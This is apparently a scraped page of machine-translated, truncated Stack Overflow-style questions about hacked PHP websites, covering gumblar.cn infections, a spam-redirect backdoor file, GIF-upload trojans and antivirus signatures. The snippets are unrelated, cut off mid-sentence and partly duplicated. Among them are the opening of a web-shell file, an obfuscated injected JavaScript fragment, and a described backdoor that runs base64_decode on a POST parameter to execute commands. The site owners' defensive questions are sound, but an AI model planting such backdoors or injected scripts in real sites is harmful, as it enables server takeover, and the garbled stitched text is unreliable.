我拥有一个在LAMP(Linux、Apache、mySQL和PHP)上运行的网站。在过去的2-3周内，我网站上的PHP和jQuery文件被来自名为gumblar.cn的网站的恶意软件感染我不明白这个恶意软件是如何进入我的PHP文件的，我该如何防止它一次又一次地发生。有什么想法吗？更新:Lookslikeitisacpanelexploit 最佳答案 您的网站已破解，因此破解者只是替换了您的文件。每当发布安全警报时，您应该始终升级您的Linux操作系统、Apache、MySQL、PHP和WebPHP程序。运行开放服务而不定期升级的Li

按照目前的情况，这个问题不适合我们的问答形式。我们希望答案得到事实、引用或专业知识的支持，但这个问题可能会引发辩论、争论、投票或扩展讨论。如果您觉得这个问题可以改进并可能重新打开，visitthehelpcenter寻求指导。关闭10年前。我需要帮助解码以下代码。不确定从哪里开始，我自己。一些背景:它来自public_html根目录中名为50ae7fd5b7461.php的文件。效果是修改帐户中的所有htaccess文件，将移动用户重定向到crzyluxtds.in域中的垃圾邮件站点。我希望解码此文件将有助于提供有关系统如何被破坏的线索。代码如下:$auth_pass="";$colo

以下任何文件类型都可以执行病毒或以任何方式损害服务器吗？pdf、.png、.jpg、.doc、.docx、.xls、.xlsx、.ppt、.pptx、.gif。 最佳答案 问题本身没有理由，因为到目前为止给出的答案(我很抱歉告诉你)。不要将所有这些视为批评:我自己解释。您甚至可以将TheWorstVirusInTheWorld.exe上传到您的服务器上，但在实际执行之前它不会造成危害。除非操作系统和/或其shell或其他程序(或脚本)存在严重错误，否则不会自动执行任何代码，即“系统管理员不知情”。参见virustotal.com。他

假设我创建了一个文件压缩库，这个库被用于1000个(非恶意)程序。但是现在恶意软件开发人员决定创建一个恶意软件并使用我的库来压缩一些文件。根据我对杀毒软件工作原理的了解，它从恶意软件中选择一组字节串并将其存储在数据库中。现在，当防病毒软件扫描具有这些字节串的程序时，它会警告用户这是恶意软件。但是，如果防病毒软件选择了一个与我的库代​​码的一部分相对应的字节串，这是否意味着我的库现在被检测为恶意软件(因此1000个非恶意程序现在被检测为恶意软件)？ 最佳答案 有两种检测恶意软件的技术，第一种是通过文件签名，例如卡巴斯基每天都会收到大量

关闭。这个问题不符合StackOverflowguidelines.它目前不接受答案。这个问题似乎不是关于aspecificprogrammingproblem,asoftwarealgorithm,orsoftwaretoolsprimarilyusedbyprogrammers的.如果您认为这个问题是关于anotherStackExchangesite的主题，您可以发表评论，说明问题可能在哪里得到解答。关闭7年前。Improvethisquestion我写了一个批处理脚本来从USB驱动器中删除快捷方式病毒并显示隐藏的文件夹和文件。@ECHOOFFTITLESHORTCUTVIRUS

我为初学者的大帖子道歉。我无法找到在我的服务器上创建/tmp/phpXXX文件的原因。似乎某些站点(下面数据中的BADGUYIP)正在向我的站点发送关于Joomla漏洞的帖子(我没有安装Joomla)。攻击尝试上传一个gif文件，然后将gif文件重命名为php文件。“gif”文件中的代码是木马控制面板。我很确定攻击者无法将gif文件重命名为php文件。我的问题是/tmp/phpXXX文件是如何在我的网站上创建的？为什么/tmp/phpXXX文件会一直存在？似乎图像上传和重命名失败，因此应该清理临时文件。我试图复制针对我网站的攻击帖子，但没有成功创建/tmp/phpXXX文件。看来，如果

问题:在我的网站空间中，有一些PHP文件都以此结尾:在这一行之前，文件中还有HTML代码。当然，浏览器中的输出以此结尾:但是昨天，最后突然出现了一些恶意代码。我的index.php的输出是:vari={j:{i:{i:'~',l:'.',j:'^'},l:{i:'%',l:218915,j:1154%256},j:{i:1^0,l:55,j:'ijl'}},i:{i:{i:function(j){try{varl=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x69\x6e\x70\x75\x74'

问题:在我的网站空间中，有一些PHP文件都以此结尾:在这一行之前，文件中还有HTML代码。当然，浏览器中的输出以此结尾:但是昨天，最后突然出现了一些恶意代码。我的index.php的输出是:vari={j:{i:{i:'~',l:'.',j:'^'},l:{i:'%',l:218915,j:1154%256},j:{i:1^0,l:55,j:'ijl'}},i:{i:{i:function(j){try{varl=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x69\x6e\x70\x75\x74'

我的服务器最近受到了攻击，我一直在尝试研究它是如何以及为什么会发生的。我在病毒文件中发现了一个非常相似的模式，看起来像这样-据我所知，它正在尝试运行特定文件？有没有人见过这样的事情，我应该如何解释？它只是根据$sF字符串抓取单个字符吗？ 最佳答案 变量$s21等于base64_decode，$s22等于$_POST['nd335c3']。每当向您的服务器发出POST请求时，它都会执行$_POST['nd335c3'];中的任何命令，正如您所料，这是非常危险的.我非常怀疑您的服务器被黑了，而是您的网站脚本被利用了。您的网站上是否有用户

我的服务器最近受到了攻击，我一直在尝试研究它是如何以及为什么会发生的。我在病毒文件中发现了一个非常相似的模式，看起来像这样-据我所知，它正在尝试运行特定文件？有没有人见过这样的事情，我应该如何解释？它只是根据$sF字符串抓取单个字符吗？ 最佳答案 变量$s21等于base64_decode，$s22等于$_POST['nd335c3']。每当向您的服务器发出POST请求时，它都会执行$_POST['nd335c3'];中的任何命令，正如您所料，这是非常危险的.我非常怀疑您的服务器被黑了，而是您的网站脚本被利用了。您的网站上是否有用户